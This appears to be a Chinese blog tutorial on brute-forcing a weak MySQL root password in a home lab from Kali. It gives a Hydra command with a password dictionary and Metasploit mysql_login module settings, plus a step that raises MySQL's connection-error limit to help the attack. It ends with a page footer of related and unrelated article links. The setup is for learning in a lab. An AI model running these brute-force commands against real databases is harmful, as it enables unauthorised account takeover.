文章目录

  • 环境配置
    • 主机
    • 数据库
  • 使用 Hydra 工具进行暴力破解
  • 使用 metsploit 暴力破解
    • 基本模块
    • 基本命令

环境配置

主机

靶机: 本地Linux服务器虚拟机 + phpstudy

攻击主机:本地 Kali 虚拟机

配置好网络让主机之间相互可以通信

数据库

数据库版本:mysql 5.5.62

  1. 开启 mysql 远程连接 ,否则攻击主机无法建立与靶机数据库连接

    我是直接在小皮面板中开启

  2. 修改 mysql 最大错误连接数量,默认为 100 ,改为 1000, 方便暴力破解

使用 Hydra 工具进行暴力破解

kali 自带的 hydra 工具是一款非常强大的暴力破解工具

  1. 直接输入hydra 查看一下 hydra 的命令

    -l 小写 指定用户名
    -L 大写 指定用户名字典
    -p 小写 指定密码
    -P 大写 指定密码字典
    -C 指定用户名:密码 字典
    -M 指定目标ip列表文件
    -t 同时运行的线程数
    
  2. 使用 hydra 指定密码字典和 mysql 服务进行攻击,可以看到爆破成功

    hydra -l root -P '密码字典文件目录' 目标ip mysql
    

使用 metsploit 暴力破解

Metasploit是一种安全框架,为渗透测试工程师提供了大量渗透模块和扫描模块

基本模块

基本模块名 功能
Auxiliary(辅助模块) 包含扫描、fuzz测试、拒绝服务攻击、网络协议欺骗等程序
Exploits(攻击模块) 是一段程序,运行时会利用目标的安全漏洞进行安全测试
Payload(攻击载荷模块) 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限
Post(后渗透模块) 通常用来对代码进行混淆,绕过安全保护机制的检验
Encoders(编码模块)

基本命令

命令名 作用
use [Auxiliary/Exploit/Payload/Encoder] 选择一个指定的模块并使其开始工作
show [exploits/payload/encoder/auxiliary/option] 显示可用的特定功能的模块
set [options/payload] 给某个特定对象赋值
setg [options/payload] 给某个对象赋值的同时设定作用域为全局,在模块进行切换的时候,该对象的值不会被改变
Run 在设置一个辅助模块需要的所有选项之后,启动该辅助模块
exploit 启动一个渗透模块
back 取消当前选择的模块并且退回到上一级命令窗口
Info 列出相关模块的信息
Search 搜索符合条件的特定模块
Session 列出当前可用的会话
use auxiliary/scanner/mysql/mysql_login //使用 mysql 暴力破解模块
set rhosts 192.168.183.134              //设置目标 ip
set username root                       //设置用户名
set pass_file /home/zyw/桌面/FastPwds.txt //指定字典
run                                     //开始爆破

爆破成功

mysql 弱口令暴力破解本地渗透测试相关推荐

  1. 弱口令暴力破解详解(包含工具、字典下载地址)

    目录 一.弱口令概述 二.Web类-加密&验证码后台猜解 三.服务类-SSH&RDP远程终端猜解 四.应用类-ZIP&Word文件压缩包猜解 一.弱口令概述         弱 ...

  2. Kali系统MSF模块暴力破解MySQL弱口令漏洞

    一.实验环境 1.攻击方: 攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简 ...

  3. 渗透测试-暴力破解之验证码测试token防爆破绕过

    暴力破解之验证码测试token防爆破绕过 文章目录 暴力破解之验证码测试token防爆破绕过 前言 一.什么是token 二.验证码之token防爆破绕过 总结 前言 一.什么是token 客户端to ...

  4. 面向WiFi密码破解的渗透测试研究

    面向WiFi密码破解的渗透测试研究 前言: WiFi使用现状:目前现代化的社会,WiFi的普及率很高,但人们的防范意识还是相当薄弱,许多家庭和公司的WiFi密码设置都为了方便仍然会使用弱口令,或者选择 ...

  5. 口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解

    Telnet协议暴力破解 Telnet Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式.它为用户提供了在本地计算机上完成远程主机工作的能力.要开始一个 ...

  6. mysql弱口令加强,Mysql弱口令取得系统权限(续)

    春节期间电脑由于Mysql弱口令导致系统被入侵,这两天一直在模拟入侵过程.在网上查阅了好多资料,也问了几个网友,最终成功地利用Mysql弱口令入侵了我自己的电脑. 前面的入侵过程没有问题,问题出在了那 ...

  7. 暗渡陈仓:用低功耗设备进行破解和渗透测试

    信息安全技术丛书 暗渡陈仓:用低功耗设备进行 破解和渗透测试 Hacking and Penetration Testing with Low Power Devices [美]菲利普·布勒斯特拉(P ...

  8. 局域网弱口令扫描工具_安全测试技术 | 渗透测试获取弱口令密码,你的账号安全了吗?...

    1.Burp suite官网下载 Burp Suite 是用于攻击web 应用程序的集成平台.它包含了许多Burp工具,这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础 ...

  9. web后台登录口令暴力破解及防御

    在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等.前台用户可以自由注册,而后台是网站管理或者维护人员设定 ...

最新文章

  1. C++库文件和头文件编写教程
  2. PingingLab传世经典系列《CCNA完全配置宝典》-2.5 RIPv2基本配置
  3. java logic_java logic怎么做用户登录
  4. Live Wallpaper HD for Mac(天气动态壁纸软件)
  5. 网易新闻 鸿蒙,本报记者体验华为首款鸿蒙产品
  6. 不需要英语的计算机行业,北京评职称不再考外语计算机 将涉及300多万人
  7. 【ICEPAK】手把手教你热仿真
  8. journalctl如何使用?
  9. 18位 身份证号 的 组成 部分
  10. 多项式时间 P问题NP问题
  11. 论文阅读《High-Definition Map Generation Technologies For Autonomous Driving: A Review》1
  12. 爱普生Epson Artisan 800 一体机驱动
  13. 【实战笔记】Java 算法与数据结构-排序(选择、插入、冒泡、希尔、归并、快速、堆)
  14. 分析N沟道MOS管和P沟道MOS管在电路中的详细应用
  15. 孟郎诗词网3.0版本问题总结
  16. 如何搭建一个自己的音乐服务器
  17. linux内核printk调试手段,linux内核printk调试
  18. 用QRCode生成带有中间logo图的二维码
  19. JAVA复制对象给另一个对象
  20. [日语二级词汇]日语二级必会汉字总结6

热门文章

  1. win10系统如何进入BIOS模式
  2. Mysql 多行显示在一行详解 group_concat()
  3. Java的第五次总结
  4. NS2仿真实验环境搭建和实验过程
  5. layui 翻页记住选择
  6. 2D Minecraft(2D 我的世界)
  7. “人工智能女王”卡塞尔中国行——AI降临?
  8. 用类来进行长方体的体积计算
  9. Java实现模拟电梯上下楼,初学者练手
  10. [量化-002]量化平台和量化理论